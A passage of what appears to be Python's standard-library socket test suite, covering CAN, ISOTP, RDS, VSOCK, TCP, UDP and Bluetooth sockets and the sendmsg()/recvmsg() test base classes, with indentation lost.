with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
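# A standalone sketch of the fileno()/detach() pattern exercised by
# _test_socket_fileno() above: socket.socket(fileno=...) wraps an existing
# descriptor in a second socket object, after which exactly one of the two
# objects should own (and eventually close) the fd; detaching the original
# avoids a double close. This helper is illustrative only and is not called
# by any test.
def _fileno_duplication_sketch():
    original = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    duplicate = socket.socket(fileno=original.fileno())
    original.detach()  # give up ownership; only `duplicate` closes the fd
    return duplicate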
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
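# A standalone sketch of the frame helpers in CANTest above, using an
# explicit struct layout so it does not depend on the class attribute
# can_frame_fmt (the "=IB3x8s" layout below mirrors struct can_frame from
# <linux/can.h> and is an assumption here, not taken from this module).
# Round-tripping recovers the CAN id and the first can_dlc bytes of data.
def _can_frame_roundtrip_sketch(can_id=0x123, data=b'\x01\x02\x03'):
    fmt = "=IB3x8s"  # can_id (u32), can_dlc (u8), 3 pad bytes, 8 data bytes
    frame = struct.pack(fmt, can_id, len(data), data.ljust(8, b'\x00'))
    unpacked_id, can_dlc, payload = struct.unpack(fmt, frame)
    return unpacked_id, payload[:can_dlc]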
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@requireSocket("AF_BLUETOOTH", "SOCK_STREAM", "BTPROTO_RFCOMM")
class BasicBluetoothTest(unittest.TestCase):
def setUp(self):
self.bs = socket.socket(socket.AF_BLUETOOTH,
socket.SOCK_STREAM,
socket.BTPROTO_RFCOMM)
def tearDown(self):
self.bs.close()
def test_address_invalid(self):
addr = 'ff:ff:ff:ff:fffa'
msg = '"{addr} is not a valid address.'.format(addr=addr)
with self.assertRaisesRegex(OSError, 'bad bluetooth address', msg=msg) as cm:
self.bs.connect((addr, 1))
self.assertIsNone(cm.exception.errno, msg)
def test_address_overflow(self):
addr = '{0:x}:10:60:0:AA:08'.format(2 ** (8 * struct.calcsize('I')))
msg = '"{addr}" is not a valid address.'.format(addr=addr)
with self.assertRaisesRegex(OSError, 'bad bluetooth address', msg=msg) as cm:
self.bs.connect((addr, 3))
self.assertIsNone(cm.exception.errno, msg)
def test_address_valid(self):
addr = 'C0:10:60:AA:36:F8'
msg = '"{addr}" is a valid address.'.format(addr=addr)
with self.assertRaises(OSError, msg=msg) as cm:
self.bs.connect((addr, 1))
# valid bluetooth address, failing connection
self.assertIsNotNone(cm.exception.errno, msg)
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
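# As a concrete illustration of the composition described above, a final
# test class is typically assembled along these lines (the combined class
# shown here is hypothetical; the actual concrete classes appear later in
# this file):
#
#   @requireAttrs(socket.socket, "sendmsg")
#   class SendmsgUDPSketch(SendmsgConnectionlessTests, UDPTestBase):
#       pass
#
# i.e. a generic sendmsg()/recvmsg() mixin is paired with a SocketTestBase
# subclass that supplies concrete cli/serv sockets, while the Sendrecvmsg*
# base classes map those onto cli_sock/serv_sock and fill in destination
# addresses or expected msg_flags as needed.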
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and that bit is not ignored. (A standalone sketch
# of this merging logic follows after this class.)
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
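# A tiny standalone illustration of the flag bookkeeping in checkFlags()
# above, written with plain integers so it can be read in isolation: the
# explicit checkset/checkunset arguments override the per-class defaults,
# ignored bits are masked out, and the surviving mask is compared against
# the received msg_flags. Not used by any test.
def _check_flags_sketch(flags, defaultset=0, defaultunset=0,
                        checkset=0, checkunset=0, ignore=0):
    defaultset &= ~checkunset     # explicit "unset" beats a default "set"
    defaultunset &= ~checkset     # explicit "set" beats a default "unset"
    checkset |= defaultset
    checkunset |= defaultunset
    if checkset & checkunset & ~ignore:
        raise ValueError("contradictory set/unset requirements")
    mask = (checkset | checkunset) & ~ignore
    return flags & mask == checkset & mask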
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
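# Illustrative sketch (not part of the test suite): the conversion that
# RecvmsgIntoMixin.doRecvmsg() performs, applied to a result already obtained
# from recvmsg_into().  Pure data shuffling, no sockets involved, and nothing
# in this module calls it.
def _example_recvmsg_into_to_recvmsg(buf, result):
    # recvmsg_into() returns (nbytes, ancdata, msg_flags, address), whereas
    # recvmsg() returns (data, ancdata, msg_flags, address).
    nbytes, ancdata, msg_flags, address = result
    return (bytes(buf[:nbytes]), ancdata, msg_flags, address)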
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
